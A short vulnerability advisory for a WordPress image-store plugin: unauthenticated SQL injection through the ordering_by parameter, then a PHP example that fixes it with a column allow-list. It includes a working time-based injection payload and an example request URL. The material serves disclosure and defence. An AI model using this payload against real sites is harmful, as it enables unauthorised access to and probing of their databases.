The plugin does not sanitise and escape the ordering_by query parameter before using it in a SQL statement on pages where the [codepeople-image-store] shortcode is embedded, allowing unauthenticated users to perform an SQL injection attack.
On a page where the [codepeople-image-store] shortcode is embedded, append the following payload: ordering_by=post_author+and+sleep(5)
e.g. https://example.com/?cpis_image=test&ordering_by=post_author+and+sleep(5)
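
The following is an added example, not the plugin's own code or its patch: it shows the usual fix for an injectable ORDER BY value, which is to map the request parameter onto a fixed allow-list of column names, because an identifier cannot be bound as an ordinary query parameter. The function names, the allow-list contents other than post_author, and the wp_posts query are assumptions made for illustration.

```php
<?php
// Added example: hypothetical helper, not taken from the plugin.
// Only post_author appears on the page; the other columns are assumed.
const ORDER_COLUMNS = [
    'post_title'  => 'post_title',
    'post_date'   => 'post_date',
    'post_author' => 'post_author',
];

// Return a column name that is safe to place after ORDER BY.
function safe_order_by(array $query, string $default = 'post_title'): string
{
    $raw = $query['ordering_by'] ?? '';
    if (!is_string($raw)) {
        // ordering_by[]=x arrives as an array; reject it outright.
        return $default;
    }
    $key = strtolower(trim($raw));
    // Exact-match lookup: the text that reaches the SQL string is the
    // constant from the map, never the request value itself.
    return ORDER_COLUMNS[$key] ?? $default;
}

// Assumed query shape; the plugin's real statement is not shown on the page.
function build_query(array $query): string
{
    return 'SELECT ID, post_title FROM wp_posts ORDER BY ' . safe_order_by($query);
}

// Constructed inputs: the query string from the advisory, a benign
// request, and the array form of the same parameter.
$samples = [
    'cpis_image=test&ordering_by=post_author+and+sleep(5)',
    'cpis_image=test&ordering_by=post_author',
    'cpis_image=test&ordering_by[]=post_author',
];

foreach ($samples as $qs) {
    parse_str($qs, $params);
    echo $qs, PHP_EOL, '  => ', build_query($params), PHP_EOL;
}
```

With the allow-list in place, the advisory's query string no longer matches any key and the statement falls back to the default column, while the benign request still sorts by post_author.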